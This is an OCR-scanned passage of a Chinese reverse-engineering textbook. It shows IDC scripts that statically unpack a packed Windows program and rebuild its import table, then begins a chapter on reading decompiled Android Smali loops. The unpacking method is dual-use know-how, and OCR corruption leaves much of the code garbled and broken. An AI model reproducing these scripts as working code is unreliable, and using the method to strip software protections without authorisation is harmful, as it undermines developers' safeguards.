seg001:004528D0 

seg001:004528D2 ; 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 

seg001:004528D2 nop 
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seg001:004528D3 nop 

seg001:004528D4 nop 

seg001:004528D5 nop 

seg001:004528D6 nop 

seg001:004528D7 nop 

seg001:004528D7 

seg001:004528D8 

seg001:004528D8 loc 4528D8: ; CODE XREF: sub 4528D0:loc 4528E9 j 

seg001:004528D8 mov al, [esi] 31] 

seg001:004528DA inc esi 

seg001:004528DB mov [edi], al 

seg001:004528DD inc edi 

seg001:004528DD 

seg001:004528DE 

seg001:004528DE loc_4528DE: ; CODE XREF: sub_4528D0+BA j 

seg001:004528DE ; sub_4528D0+D1 j 

seg001:004528DE add ebx, ebx 

seg001:004528E0 jnz short loc_4528E9 

seg001:004528E0 

5е9001:004528Е2 

5е9001:004528Е2 loc 4528Е2: ; CODE XREF: sub 452800 j 

5е9001:004528Е2 mov ebx, [esi] // 从 这 里 开始 

seg001:004528E4 

seg001:004528E4 loc 4528E4: 

seg001:004528E4 sub esi, -4 

seg001:004528E7 adc ebx, ebx 

5е9001:004528Е7 

seg001:004528E9 

seg001:004528E9 loc_4528E9: ; CODE XREF: sub_4528D0+10 j 

seg001:004528E9 jb short loc_4528D8 

在 上 述 代码 中 ， 在 开始 的 地 方 需要 访问 ESI 指向 的 内 存 ， 往 回 看 发 现 解密 代码 需要 的 参数 ， 在 前 面 自 
修改 代码 部 分 (0046206F) 已 经 处 理 过 了 。 该 处 代码 很 容易 转 成 高 级 语言 ， 现 在 来 看 看 如 何 重 整 代码 的 流 
程 。 跳 转向 上 时 ， 代 表 一 个 循环 。 这 与 高 级 语言 是 相通 的 ， 值 得 注意 的 是 向 下 的 跳 转 。 达 到 某 一 条 件 ， 就 
绕 过 一 部 分 代码 ， 向 后 执行 ， 这 与 高 级 语言 中 的 IF 控制 诸 句 相似 ， 即 遇 到 某 一 条 件 就 执行 随后 的 代码 。 也 
就 是 说 需要 反 转 比较 条 件 。 

以 给 出 的 代码 为 例 ， 与 自身 相 加 ， 相 当 于 乘 2， 实 际 就 是 一 个 向 左 位 移 操作 。 十 进 制 中 ， 把 1 向 左 移动 

-位 ， 实 际 就 是 将 1 乘 以 10。 在 二 进 制 中 也 是 一 样 ， 将 一 个 二 进 制 数 向 左 移动 一 位 ， 则 是 乘 以 2。 汇 编 指 

S jb 仅 在 进位 标记 CF=1 时 跳 转 ， 也 就 是 说 004528E7 处 的 adc ebx。ebx 及 后 面 的 jb short loc 4528D8 的 意 
义 为 ， 将 EBX 中 的 数 向 左 移 一 位 ， 并 检查 最 高 位 是 否 为 1， 为 1 则 向 上 跳 转 ， 也 就 是 循环 ，0 则 继续 执行 ， 
即 终止 循环 的 条 件 。 现 在 可 以 构造 下 面 循环 的 框架 。 

auto EBX,HigtBitfla; 

while (HigtBitflat != ОХ 


HigtBitflat = EBX & 0x80000000; // 与 0x80000000 进行 and 运算 
/最 高 位 不 为 0 则 HigtBithat 为 0 
//0x80000000 最 高 位 为 1， 其 他 位 为 0 
// 不 明白 的 读者 可 将 其 展开 计算 

EBX = EBX + EBX; // 向 左 位 移 
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现在 再 来 看 004528DE 处 的 代码 ，jnz 在 ZF=0 时 产生 跳 转 ， 即 当 最 高 位 之 外 任意 一 位 不 为 0 时 产生 跳 
转 。 正 如 上 面 说 的 ， 将 跳 转 条 件 反 转 ， 便 能 使 用 正 语句 了。 
Auto EBX,IsNotZero; 
IsNotZero = EBX & 0x7FFFFFFF; /0Ox7FFFFFFF 最 高 位 为 0 
/屏蔽 最 高 位 ， 以 检查 后 面 的 位 
// 仅 当 最 高 位 外 全 为 0，IsNotZero 为 0 


If (IsNotZero == 0) { 
/此 处 可 以 填 上 004528E2 到 004528E7 的 代码 


yz = EBX + EBX; /注意 这 里 与 汇编 的 区 别 
// 先 判断 ， 然 后 才 移 位 
注意 这 里 与 汇编 代码 的 区 别 ， 由 于 无 法 在 IDC 上 访问 标记 寄存 器 ， 也 无 法 使 用 跳 转 ， 所 以 只 能 先 判 断 
最 高 位 ， 然 后 才 进 行 位 移 。 下 面 直接 看 最 后 得 出 的 IDC 脚本 。 
#include "idc.idc" 


static main() ( 
auto MyAddr,DeCodeAddr,HigtBitflat, EBX; 
auto EAX,ECX,EBP,ESI,EDX,CF,IsNotZero,Counter; 


MyAddr = 0x447000; 
DeCodeAddr =0x447000 - 0x46000; 
ESI=DeCodeAddr; 
Counter = 0; // 初 始 化 循环 条 件 
СЕ =0; /代表 标志 寄存 器 的 CF 位 
EBX = Dword(MyAddr); 
MyAddr = MyAddr + 4; 
HigtBitflat = EBX & 0x80000000; 
EBX = EBX + EBX; 
EBX++; 
/为 了 统一 循环 入 口 ， 将 部 分 代码 移出 循环 执行 
while (Counter != 1)( 
while (HigtBitflat != 0){ 
PatchByte (DeCodeAddr,Byte(MyAddr)); 
MyAddr++; 
DeCodeAddr++; 
IsNotZero = EBX & 0x7FFFFFFF; 
if (IsNotZero == 0){ 
CF-1; sub esi, -4 5 add esi,4 的 区 别 就 是 前 者 CF=1 
EBX = Dword(MyAddr); 
MyAddr = MyAddr + 4; 


} 
HigtBitflat = EBX & 0x80000000; 
EBX = EBX + EBX; 
EBX = EBX + CF; JME CF, #4 ADC 指令 
CF =0; 
} 
EAX = 1; 


while (Counter != 1){ 
/4528F0 到 45291A, Д JMP 构成 一 个 循环 。 因 此 使 用 while 语句 ， 构 造 
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// 一 个 无 限 循环 。 在 符合 终止 循环 条 件 处 使 用 break 指令 结束 循环 
IsNotZero = EBX & Ox7FFFFFFF; 
if (IsNotZero == O)( 
CF=1; 
EBX = Dword(MyAddr); 
MyAddr = MyAddr + 4; 
} 
HigtBitflat = EBX & 0x80000000; 
EBX = EBX + EBX; 
EBX = EBX + CF; 
CF = 0; 
EAX = EAX + EAX; 
if (HigtBitflat != 0) EAX++; 
HigtBitflat = EBX & 0x80000000; 
if (HigtBitflat != OX 
IsNotZero = EBX & 0x7FFFFFFF; 
if (IsNotZero != 0){ //00452901 
EBX = EBX + EBX; 
break; 


jnz shortloc 45291C 


) 
EBX = Dword(MyAddr); 
MyAddr = MyAddr + 4; 
HigtBitflat = EBX & 0x80000000; 
if (HigtBitflat != 0) { 110045290A 
EBX = EBX + EBX; 
EBX++; 
break; 


jb short loc_45291C 


CF=1; 


EBX = EBX + EBX; 
EBX = EBX + CF; 
CF = 0; 
EAX-; 
IsNotZero = EBX & OX7FFFFFFF; 
if (IsNotZero == O)( 
CF=1; 
EBX = Dword(MyAddr); 
MyAddr = MyAddr + 4; 
) 
HigtBitflat = EBX & 0x80000000; 
EBX = EBX + EBX; 
EBX = EBX + CF; 
CF = 0; 
EAX = EAX + EAX; 
if (HigtBitflat != 0) EAX++; 


} 
ECX = 0; Пхог ecx,ecx 常见 的 为 寄存 器 赋值 为 0 的 语句 
/注意 00452921 jb shortloc 452934 处 ， 程 序 分 开 两 条 路 线 


// 在 loc_45293F 处 汇合 。 因 此 这 里 使 用 if...else 语句 重 整 程序 流程 
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if (EAX < 3){ ”// 此 处 直接 使 用 减法 指令 作 比 较 ， 而 不 是 使 用 CMP 
EAX = EAX - 3; /因此 只 能 在 比较 之 后 再 减 
IsNotZero = EBX & Ox7FFFFFFF; 
if (IsNotZero == OX 
CF=1; 
EBX = Dword(MyAddr); 
MyAddr = MyAddr + 4; 
} 
HigtBitflat = EBX & 0x80000000; 
EBX = EBX + EBX; 
EBX = EBX + CF; 
CF = 0; 
H 
else( 
EAX = EAX - 3; 
EAX = EAX << 8; 
EAX = EAX + Byte(MyAddr); 
MyAddr++; 
EAX = EAX ^ 0xffffffff; 
if (EAX == 0) break; 


HigtBitflat = EAX & 1; /检查 sar eax, 1 是 否 影响 CF 位 
EAX = EAX >> 1; /检查 结束 再 执行 位 移 
EBP = EAX; 


) 
ECX = ECX + ECX; 
if (HigtBitflat != 0) ECX++; 
IsNotZero = EBX & 0x7FFFFFFF; 
if (IsNotZero == O)( 
CF=1; 
EBX = Dword(MyAddr); 
MyAddr = MyAddr + 4; 
} 
HigtBitflat = EBX & 0x80000000; 
EBX = EBX + EBX; 
EBX = EBX + CF; 
CF = 0; 
ECX = ECX + ECX; 
if (HigtBitflat != 0) ECX++; 


if (ECX == 0 X 
ECX++; 
HigtBitflat = 0; 


1100452960 jnb short loc_452951 
//0045296B jnb short loc 452951 
/此 处 有 两 个 跳 转 指向 循环 入 口 ， 将 00452960 处 的 条 件 反 转 ， 翻 译 成 i 语句。 便 可 得 到 下 面 的 循环 
while (HigtBitflat == OX 
IsNotZero = EBX & 0x7FFFFFFF; 
if (IsNotZero == 0){ 

CF=1; 

EBX = Dword(MyAddr); 

MyAddr = MyAddr + 4; 
} 
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HigtBitflat = EBX & 0x80000000; 

EBX = EBX + EBX; 

EBX = EBX + CF; 

CF = 0; 

ECX = ECX + ECX; 

if (HigtBitflat != 0) ECX++; 

HigtBitflat = EBX & 0x80000000; 

if (HigtBitflat != 0)( 

IsNotZero = EBX & Ox7FFFFFFF; 

if (ISNotZero != 0) ( 

EBX = EBX + EBX; 

break; 

} 

EBX = Dword(MyAddr); 

MyAddr = MyAddr + 4; 

CF=1; 

HigtBitflat = EBX & 0x80000000; 
} 

EBX = EBX + EBX; 

EBX = EBX + CF; 

CF = 0; 


ECX = ECX + 2; 


IDA Pro 实战 一 一 反 编 译 和 了 脱 壳 


} 
/高 级 语言 的 比较 为 有 符号 数 的 比较 ,而 0045297F jbe shortloc 452990 


// 是 无 符 分 数 的 比较 。 因 此 要 先 比较 其 最 高 位 ， 模 拟 无 符号 数 的 比较 
HigtBitflat = EBP & 0x80000000; 

if (HigtBitflat !=0){ 

if (ЕВР < 0xfffffb00) CF =1; 


} 
else{ 
CF =1; 
} 
ECX ++; 
ECX = ECX + CF; 
CF=0; 


EDX = DeCodeAddr + EBP; 
if (HigtBitflat !=0){ 
if (EBP > -4) CF=1; 
} 

110045297F jbe shortloc 452990 将 此 处 分 开 两 条 路 线 ， 
/以 jmp loc 4528DE 重新 汇合 。 这 里 同样 使 用 if...else 语句 
if (CF==1X 
CF=0; 
while (ECX !=0)( 
PatchByte(DeCodeAddr,Byte(EDX)); 
EDX ++; 
DeCodeAddr ++; 
ECX --; 

) 
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else{ 

while(Counter != 1){ 
PatchDword(DeCodeAddr,Dword(EDX)); 
EDX = EDX + 4; 

DeCodeAddr = DeCodeAddr + 4; 

if (ECX <= 4( 

ECX= ECX -4; 

break; 

x 

ECX = ECX - 4; 

} 

DeCodeAddr = DeCodeAddr + ECX; 


} 

// 反 汇编 代码 的 循环 入 口 (4528DE) 与 转换 的 循环 入 口 不 同 (4528E9) 

// 跟 开始 的 时 候 一 样 ， 入 口 之 前 的 代码 放 到 循环 外 面 

IsNotZero = EBX & 0x7FFFFFFF; 

if (IsNotZero == O)( 

CF=1; 
EBX = Dword(MyAddr); 
MyAddr = MyAddr + 4; 
} 

HigtBitflat = EBX & 0x80000000; 

EBX = EBX + EBX; 

EBX = EBX + CF; 

CF =0; 

) 
} 

到 此 为 止 ， 已 经 成 功 地 将 004528D0 到 004529A1 处 的 代码 转换 成 C 代码 。 在 完成 如 此 复杂 的 代码 还 原 
之 后 , 004529A6 到 00452908 处 的 反 汇 编 代码 会 更 容易 完成 。 里 面 的 代码 也 很 好 理解 , 将 符合 ES 01 和 E9 01 
的 机 械 码 解密 。 位 移 指令 可 以 通过 借用 程序 中 一 个 闲置 的 Dword， 使 用 IDC 提供 的 Patch 系列 指令 来 模拟 ， 
详 见 Patch6.idc。 在 完成 最 后 的 解密 代码 后 ， 便 是 IAT 的 修复 了 。 现 在 看 下 面 的 代码 。 

004529DA lea edi, [esi+50000h] 

004529E0 loc_4529E0: 

004529E0 mov eax, [edi] 

004529E2 or eax, eax 

004529E4 jz short loc_452A22 

004529E4 

004529E6 mov ebx, [edi+4] 

004529E9 lea eax, [eax+esi+549BOh] 

004529F0 add ebx, esi 

004529F2 push eax 

004529F3 add edi, 8 

004529F6 call dword ptr [esi+54A3Ch] 

004529FC xchg eax, ebp 

004529FD loc_4529FD: 

004529FD mov al, [edi] 

004529FF inc edi 

00452A00 or al, al 

00452A02 jz short loc 4529E0 

00452A02 
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00452A04 mov ecx, edi 
00452A06 push edi 

00452A07 dec eax 

00452A08 repne scasb 
00452A0A push ebp 

00452A0B call dword ptr [esi+54A40h] 
00452A11 or eax, eax 

00452A13 jz short loc_452A1C 
00452A13 

00452A15 mov [ebx], eax 
00452A17 add ebx, 4 
00452A1A jmp short loc 4529FD 


然后 向 上 滚动 
- 编 窗口 后 会 发 现 从 “004529A6 pop esi” 位 置 开 始 ，ESI 便 没有 被 修改 过 ， 而 此 位 置 对 应 于 : 
seg005:0046206F mov esi, offset unk_447000 
seg005:00462074 lea edi, [esi-46000h] 
seg005:0046207A push edi 


由 此 可 见 ， 通 过 ESI=0x401000 很 容易 计算 出 004529F6 和 00452A0B 处 CALL 的 地 址 分 别 为 455A3Ch 
和 455A40h。 跳 转 到 该 地 址 后 的 效果 如 图 14-12 所 示 。 


Beu55h3C ; HMODULE — stdcall LoadLibraryh(LPCSTR lpLibFileName) 


fail 


B0455A3C extrn LoadLibraryA:dword 
80455040 ; FARPROC — stdcall GetProcAddress(HMODULE hHodule,LPCSTR lpProcName) 
90555050 extrn GetProchddress:dword 

图 14-12 НӘН 


非常 明显 ， 这 里 便 是 壳 填充 IAT 的 地 方 。 那 么 在 “004529DA lea edi, [esi+50000h]” 中 ，EDI 便 是 保存 
APL 名 字 的 数据 表 。 只 需要 API 的 名 字 为 相关 ТАТ 地 址 重 命名 便 能 分 析 了 ， 在 00452A0B 处 调用 
GetProcAddress 跟踪 它 的 参数 IpProcName (00452A06 push edi)， 以 及 其 返回 值 (00452A15 mov [ebx], eax) , 
当然 这 里 的 跟踪 既 可 以 使 用 手动 确认 方式 ， 也 可 以 通过 与 调试 器 配合 快速 得 出 结果 。 可 以 很 容易 地 得 出 下 
面 的 脚本 。 

#include "idc.idc" 


static main() ( 
auto ESI,EDI,EAX,EBX,Counter,cBuffer,BufLen,straa; 


ESI = 0x447000 - 0x46000; 

EDI = ESI + 0x50000; 

Counter = MaxEA() - MinEA(); 
MakeUnknown(MinEA(),Counter,1); /将 整个 程序 标记 未 分 析 
AnalyzeArea (MinEA(),MaxEA()); // 分 析 整 个 程序 
Counter = 0; 

while (Counter != 1){ 

EAX = Dword(EDI); 

if (EAX == 0) break; 

EBX = Dword(EDI+4); 

EBX = EBX + ESI; 

EDI = EDI + 8; 

while (Counter != 1)( 

EAX = Byte(EDI); 

EDI++; 
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if (EAX == 0) break; 
cBuffer = GetString(EDI,-1,ASCSTR C); 
straa = cBuffer +""; /ЛРА 不 允许 重复 命名 ， 加 上 “_” 避 免 重 复 
MakeNameEx(EBX,straa,SN_AUTO); 
EBX = EBX + 4; 
EDI = EDI + strlen(cBuffer); 
EDI++; 
} 
} 


} 
在 解密 后 必须 将 整个 程序 标记 为 未 分 析 , 并 重新 分 析 , 然后 才能 进行 重 命名 操作 .程序 的 OEP 如 图 14-13 
所 示 。 


push 9 ; lpHoduleNane 
call ј. GetModuleHandlef | 


nov hInstance, eax 
call j_Initcommoncontrols_ 


push в ; duInitParan 
push offset loc À13084 ; lpDialogFunc 
push 0 ; hündParent 

push — 65h ; lpTenplateNane 


push — hInstance ; hInstance 
call  j DialogBoxParamá | 


push [] 
call — j ExitProcess | 


图 14-13 程序 的 ОЕР 


到 此 为 止 ， 整 个 静态 脱 壳 过 程 全 部 讲解 完毕 。 从 这 个 例子 也 可 以 知道 ， 对 于 掌握 反 汇 编 器 的 读者 来 说 ， 
除非 反 调试 机 制 与 解密 KEY 关联 ， 否 则 根本 就 没有 强度 可 言 。 
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本 书 前 面 的 内 容 已 经 详细 讲解 了 反 编译 Android APK 文 件 的 具体 过 程 , 并 讲解 了 Smali 文 件 的 基本 知识 


Smali 文 件 是 反 编 译 APK 文件 的 产物 之 一 ,本 章 将 通过 具体 实例 的 实现 过 程 详 细 分 析 Smali 文件 的 基本 知识 ， 
为 读者 学 习 本 书后 面 的 知识 打下 基础 。 


15.1 ХА 0) 


Ши 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 15 章 \ 分 析 循环 语句 .avi 


15.1.1 创建 Android 工程 


(1) 打开 Eclipse， 新 建 一 个 Android 4.4 项 目 工程 ， 工 程 命名 为 xunhuan， 目 录 结 构 如 图 15-1 所 示 
(2) 使 用 Eclipse 工具 进行 编译 签名 操作 ， 获 取 АРК 文件 ， 如 图 15-2 所 示 。 
1 Package Explorer 22 € 


com. guan. xunhuan 


A Ф Export Android Application lolx) 
Q gen [Generated Java Files 
(57-8 con. quan- халлаа Project Checks 

由 mh Android 4.4 


Performs a set of checks to make sure the application can be exported. 
J BÀ Android Private Libraries 
D assets 


Select the project to export: 


Project: frunhuan Browse... 
Wo errors found Click Next. 
Ñ Б xunhuan 
(9) Back ех! Kin anc n 
@ = XM 


图 15-1 Android 工程 的 目录 结构 图 15-2 获取 APK 文件 
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GO 使 用 工具 对 获取 的 APK 文件 进行 反 编 译 工 作 ， 将 反 编 译 后 获取 的 文件 保存 在 “ 反 编 译 后 的 ” 目 
录 中 ， 如 图 15-3 所 示 。 


ав - | emen |58 ESN ji 
Ji res 2014/2/23 17:24 XE 
J mai 2014/2/23 17:24 хна 
口 project 2012/11/12 19:35 PROJECT 文件 1x 
@ Androi dani fest. xml 2012/11/12 19:34 XML 文档 1x 
LÌ apktool. ynl 2012/11/12 19:34 YL 文件 1 理 
p =- =- | 


В 153 “ 反 编 译 后 的 ”目录 
15.1.2 分析 Smali 文件 中 的 循环 语句 


在 Android 应 用 程序 中 ， 经 常 使 用 循环 语句 来 实现 项 目 功能 ， 其 中 最 为 常见 的 循环 结构 有 for (ER. 35 
代 器 循环 、while 循环 和 do while 循环 。 在 编写 Android 程序 迭代 器 循环 代码 时 ， 常 用 的 格式 如 下 所 示 。 

lterator< 对 象 > < 对 象 名 > = < 方法 返回 一 个 对 象 列 表 >; 

for (< 对 象 > < 对 象 名 > : < 对 象 列表 >) { 

[处 理 单个 对 象 的 代码 体 ] 


} 

在 上 述 格式 中 ， 在 关键 字 for 中 将 对 象 名 与 对 象 列表 用 冒号 “:” 隔 开 ， 然 后 在 循环 体 中 直接 访问 单个 对 
象 。 因 为 这 种 方式 的 代码 简单 ， 可 读 性 好 ， 所 以 在 实际 的 编程 过 程 中 使 用 颇 多 。 

也 可 以 是 下 面 的 格式 : 

lterator< 对 象 > < 迭代 器 > = < 方法 返回 一 个 迭代 器 >; 

while (< 迭代 器 >.hasNext()) { 

< 对 象 > < 对 象 名 > = < 迭代 器 >.next(); 
[处 理 单个 对 象 的 代码 体 ] 


} 

TELAT, ERP SIR TRAE, PR CEA HH ACRE PT: hasNextQ 
WU. BU EARNS A Arp Н: next( 方 法 来 遍历 迭代 器 。 

打开 反 编 译本 实例 APK 后 获取 的 目录 ， 然 后 找到 smali/com/guan/xunhuan 目录 下 的 文件 
MainActivity.smali， 有 具体 代码 如 下 所 示 。 

.class public Lcom/guan/xunhuan/MainActivity; 

.super Landroid/app/Activity; 

.source "MainActivity.java" 


# direct methods 
.method public constructor <init>()V 
locals 0 


.prologue 
line 17 
invoke-direct (pO), Landroid/app/Activity;-» «init» ()V 


return-void 
.end method 
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.method private dowhilexunhuan()V 
locals 7 


.prologue 

line 78 

const-string v5, "activity" 

invoke-virtual (pO, v5), Lcom/guan/xunhuan/MainActivity;-»getSystemService( java/lang/String; ). java/lang/Object; 
move-result-object vO 

check-cast v0, Landroid/app/ActivityManager; 

line 79 

local vO, activityManager:Landroid/app/ActivityManager; 

const/16 v5, 0x64 

invoke-virtual (v0, v5), Landroid/app/ActivityManager;-»getRunningServices(I)Ljava/util/List; 
move-result-object v4 

Jine 80 

Лоса! v4, servicelnfos:Ljava/util/List; ,"Ljava/util/List«Landroid/app/ActivitrManager$RunningServicelnfo;» ;" 
new-instance v3, Ljava/lang/StringBuilder; 

invoke-direct {v3}, Ljava/lang/StringBuilder;-»«init»()V 

Jine 81 

Лоса! v3, sb:Ljava/lang/StringBuilder; 

invoke-interface (v4), Ljava/util/List;->iterator()Ljava/util/Iterator; 

move-result-object v2 

ine 83 

local v2, iterator:Ljava/util/terator;,"Ljava/util/Iterator<Landroid/app/ActivityManager$RunningServicelnfo;>;" 
:cond 0 

invoke-interface (v2), Ljava/util/Iterator;->next()Ljava/lang/Object; 

move-result-object v1 

check-cast v1, Landroid/app/ActivityManager$RunningServicelnfo; 

line 84 

Јоса! v1, info:Landroid/app/ActivityManager$RunningServicelnfo; 

new-instance v5, Ljava/lang/StringBuilder; 

invoke-virtual (v1), Ljava/lang/Object;->toString()Ljava/lang/String; 


move-result-object v6 


invoke-static {v6}, Ljava/lang/String;->valueOf(Ljava/lang/Object; )Ljava/lang/String; 
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move-result-object v6 

invoke-direct (v5, v6), Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V 

const/16 v6, 0xa 

invoke-virtual (v5, v6}, Ljava/lang/StringBuilder;-»append(C)Ljava/lang/StringBuilder; 
move-result-object v5 

invoke-virtual (v5), Ljava/lang/StringBuilder;->toString()Ljava/lang/String; 

move-result-object v5 

invoke-virtual (v3, v5}, Ljava/lang/StringBuilder;-»append(Ljava/lang/String;)Ljava/lang/StringBuilder; 


Ліпе 85 
invoke-interface (v2), Ljava/util/Iterator;-»hasNext()Z 


move-result v5 
if-nez v5, :cond 0 


Jine 86 
invoke-virtual (v3), Ljava/lang/StringBuilder;->toString()Ljava/lang/String; 


move-result-object v5 
const/4 v6, 0x0 


invoke-static (pO, v5, v6), Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/Char 
Sequence;l) Landroid/widget/Toast; 


move-result-object v5 

invoke-virtual (v5), Landroid/widget/Toast;->show()V 
line 87 

return-void 


.end method 


.method private forxunhuan()V 
locals 8 


.prologue 
line 47 
invoke-virtual {p0}, Lcom/guan/xunhuan/MainActivity;->getApplicationContext()Landroid/content/Context; 


move-result-object v6 


@ 
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invoke-virtual (v6), Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager; 
move-result-object v3 

ine 49 

.local v3, pm:Landroid/content/pm/PackageManager; 


const/16 v6, 0x2000 


line 48 
invoke-virtual (v3, v6), Landroid/content/pm/PackageManager;-»getlnstalledApplications(l)Ljava/util/List; 


move-result-object vO 
line 50 


„local vO, appInfos:Ljava/util/List; 
invoke-interface {v0}, Ljava/util/Li: 


“Ljava/util/List<Landroid/content/pm/ApplicationInfo;>;" 
;->size()l 


move-result v5 

Jine 51 

local v5, size:l 

new-instance v4, Ljava/lang/StringBuilder; 
invoke-direct {v4}, Ljava/lang/StringBuilder;-»«init»()V 
ine 52 

local v4, sb:Ljava/lang/StringBuilder; 
const/4 v1, 0x0 

local v1, i:l 

:goto 0 

if-It v1, v5, :cond 0 


line 56 
invoke-virtual (v4), Ljava/lang/StringBuilder;->toString()Ljava/lang/String; 


move-result-object v6 
const/4 v7, 0x0 


invoke-static (pO, v6, v7}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/Char 
Sequence;l)Landroid/widget/Toast; 


move-result-object v6 
invoke-virtual (v6), Landroid/widget/Toast;->show()V 


line 57 
return-void 


ine 53 
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:cond 0 
invoke-interface (vO, v1), Ljava/util/List;->get(I)Ljava/lang/Object; 


move-result-object v2 

check-cast v2, Landroid/content/pm/ApplicationInfo; 

ine 54 

Лоса! v2, info:Landroid/content/pm/ApplicationInfo; 

new-instance v6, Ljava/lang/StringBuilder; 

iget-object v7, v2, Landroid/content/pm/ApplicationInfo;-»packageName:Ljava/lang/String; 
invoke-static (v7), Ljava/lang/String;->valueOf(Ljava/lang/Object; )Ljava/lang/String; 
move-result-object v7 

invoke-direct (v6, v7}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String; )V 

const/16 v7, Оха 

invoke-virtual (v6, v7}, Ljava/lang/StringBuilder;-»append(C)Ljava/lang/StringBuilder; 
move-result-object v6 

invoke-virtual (v6), Ljava/lang/StringBuilder;->toString()Ljava/lang/String; 
move-result-object v6 

invoke-virtual (v4, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String; )Ljava/lang/StringBuilder; 


ine 52 
add-int/lit8 v1, v1, Ox1 


goto :goto 0 
.end method 


.method private iterator()V 
locals 7 


.prologue 

line 34 

const-string v4, "activity" 

invoke-virtual (pO, v4), Lcom/guan/xunhuan/MainActivity;->getSystemService(Ljava/lang/String; )Ljava/lang/Object; 
move-result-object vO 


check-cast v0, Landroid/app/ActivityManager; 


ine 35 
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local vO, activityManager:Landroid/app/ActivityManager; 
invoke-virtual (v0), Landroid/app/ActivityManager;->getRunningAppProcesses()Ljava/util/List; 


move-result-object v2 

ine 36 

local v2, psinfos:Ljava/util/List;,"Ljava/util/List«Landroid/app/ActivitrManager$RunningAppProcesslnfo;»;" 
new-instance v3, Ljava/lang/StringBuilder; 

invoke-direct (v3), Ljava/lang/StringBuilder;-><init>()V 

Jine 37 

Лоса! v3, sb:Ljava/lang/StringBuilder; 

invoke-interface {v2}, Ljava/util/List;->iterator()Ljava/util/Iterator; 


move-result-object v4 


:goto 0 
invoke-interface (v4), Ljava/util/Iterator;-»hasNext()Z 


move-result v5 
if-nez v5, :cond 0 


Jine 40 
invoke-virtual (v3), Ljava/lang/StringBuilder;-»toString()Ljava/lang/String; 


move-result-object v4 
const/4 v5, 0x0 


invoke-static (pO, v4, v5), Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/Char 
Sequence;l)Landroid/widget/Toast; 


move-result-object v4 
invoke-virtual (v4), Landroid/widget/Toast;->show()V 


line 41 
return-void 


line 37 

:cond 0 

invoke-interface (v4), Ljava/util/Iterator;->next()Ljava/lang/Object; 
move-result-object v1 


check-cast v1, Landroid/app/ActivityManager$RunningAppProcessinfo; 


line 38 
Лоса! v1, info:Landroid/app/ActivityManager$RunningAppProcesslnfo; 
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new-instance v5, Ljava/lang/StringBuilder; 

iget-object v6, v1, Landroid/app/ActivityManager$RunningAppProcessInfo;->processName:Ljava/lang/String; 
invoke-static (v6), Ljava/lang/String;->valueOf(Ljava/lang/Object; )Ljava/lang/String; 
move-result-object v6 

invoke-direct (v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String; )V 

const/16 v6, Oxa 

invoke-virtual (v5, v6}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder; 
move-result-object v5 

invoke-virtual (v5), Ljava/lang/StringBuilder;->toString()Ljava/lang/String; 

move-result-object v5 

invoke-virtual (v3, v5}, Liava/lang/StringBuilder;->append(Ljava/lang/String; )Ljava/lang/StringBuilder; 


goto :goto_0 


.end method 


.method private whilexunhuan()V 


locals 7 


.prologue 

ine 63 

const-string v5, "activity" 

invoke-virtual (pO, v5), Lcom/guan/xunhuan/MainActivity;->getSystemService(Ljava/lang/ String; )Ljava/lang/Object; 
move-result-object vO 

check-cast v0, Landroid/app/ActivityManager; 

line 64 

„local vO, activityManager:Landroid/app/ActivityManager; 

const/16 v5, 0x64 

invoke-virtual (v0, v5), Landroid/app/ActivityManager;->getRunningTasks(1)Ljava/util/List; 
move-result-object v4 

ine 65 

local v4, taskInfos:Ljava/util/List;,"Ljava/util/List<Landroid/app/ActivityManager$RunningTaskinfo;>;" 
new-instance v3, Ljava/lang/StringBuilder; 


invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V 
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line 66 

.local v3, sb:Ljava/lang/StringBuilder; 

invoke-interface {v4}, Ljava/util/List;->iterator()Ljava/util/Iterator; 

move-result-object v2 

ine 67 

„local v2, iterator:Ljava/util/Iterator;,"Ljava/util/Iterator<Landroid/app/ActivityManager$Running TaskInfo;>;" 
:goto 0 

invoke-interface (v2), Ljava/util/Iterator;-»hasNext()Z 

move-result v5 


if-nez v5, :cond 0 


line 71 
invoke-virtual (v3), Ljava/lang/StringBuilder;->toString()Ljava/lang/String; 


move-result-object v5 
const/4 v6, 0x0 


invoke-static (pO, v5, v6), Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/Char 
Sequence;l)Landroid/widget/Toast; 


move-result-object v5 
invoke-virtual (v5), Landroid/widget/Toast;->show()V 


line 72 
return-void 


line 68 

:cond 0 

invoke-interface (v2), Ljava/util/Iterator;->next()Ljava/lang/Object; 
move-result-object v1 

check-cast v1, Landroid/app/ActivityManager$RunningTaskinfo; 
line 69 

local v1, info:Landroid/app/ActivityManager$RunningTaskInfo; 
new-instance v5, Ljava/lang/StringBuilder; 

invoke-virtual (v1), Ljava/lang/Object;->toString()Ljava/lang/String; 


move-result-object v6 


invoke-static (v6), Ljava/lang/String;->valueOf(Ljava/lang/Object; )L java/lang/String; 
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move-result-object v6 

invoke-direct (v5, v6), Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V 

const/16 v6, 0xa 

invoke-virtual (v5, v6}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder; 
move-result-object v5 

invoke-virtual {v5}, Ljava/lang/StringBuilder;-»toString()Ljava/lang/String; 

move-result-object v5 

invoke-virtual (v3, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String; )Ljava/lang/StringBuilder; 
goto :goto_0 


.end method 


# virtual methods 

-method public onCreate(Landroid/os/Bundle;)V 
locals 1 
.parameter "savedinstanceState" 


.prologue 


ine 21 
invoke-super (pO, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V 


ine 22 
const/high16 vO, 0x7f03 


invoke-virtual (pO, v0), Lcom/guan/xunhuan/MainActivity;-»setContentView(l)V 


line 24 
invoke-direct {p0}, Lcom/guan/xunhuan/MainActivity;-»iterator()V 


line 25 
